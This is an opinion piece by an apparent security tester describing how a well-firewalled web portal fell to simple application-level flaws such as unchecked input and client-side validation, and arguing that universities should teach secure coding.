
The application servers sat behind the newest firewalls, equipped with state-of-the-art application-layer protection. Sure enough, running the automated tools gave this setup a pretty clean bill of health. What they tend not to be so good at checking is the fresh application code, so recently turned out by the application programmers themselves.
And this is where the problems began. As we started checking the application-specific elements, it didn't take long for the system to become compromised. Ways were soon found to delete content belonging to other portal users, upload malware to the download areas, and send out emails with a malicious payload from the site.
Even more alarming, it turned out to be easy to inject our own code onto the front page of the site. To make the implications of this clear, we constructed a fake login box, allowing us to harvest the credentials of the users as they logged on to the site. In just a few minutes, it was possible to completely own the site.
This is not an isolated example: today's applications can withstand automated attacks, typified by a code red (or the white hat's automated testing tools), but moving up the application stack, vulnerabilities can easily be found, and without a great deal of skill or knowledge on the attacker's part.
While the possibilities for an large-scale automated attack such as Nimda are reduced, the field is ripe for one-off hits, the recent MySpace worm being a good example. These attacks could be to bring down a site, gain access to key information, or set up a phishing site. And there are plenty of them around.
Put simply, today's security issues are no longer about technologies, but increasingly about the human element of the implementation of those technologies; in a word, mistakes. We can find errors in four key areas: systems design, development, implementation and operations. While an automated test can help tackle issues in the last two areas, problems with design and development continue to cause the biggest headache.
Yet these troubles should be avoidable. I've still got my well-thumbed copy of Erich Gamma and co's Design Patterns on my bookshelf. This collection of all the common ways to get software design right is on the reading list of most undergraduate software engineering courses. What I see over and over again are the same mistakes repeating themselves; for example, failure to check input, relying on easily bypassed client side validation, and, in particular, false assumptions about design - "the interfaces we create will be used the way they are supposed to be".
It's disheartening to scan through the syllabuses of the various computing degrees on offer and see very little, if any, mention of security in their coding or architecture and design modules. Where it is mentioned, it is mostly pushed into a specialised niche. There seems to be a real disconnect between the aims of getting people to programme and getting them to programme safely.
The SANS Institute's recent launch of a series of exams and certifications to test the ability of programmers to code securely is a real bright spot, and I hope the initiative is successful. The exams are intended to gauge the coder's ability to identify and correct common programming errors that lead to vulnerabilities.
It's high time for the universities and colleges to wake up to the realities of the current decade and stop educating their students in the techniques and environment of the pre-web era.
This year's students will be producing next year's web applications. Which means we'll be seeing the same old security mistakes again.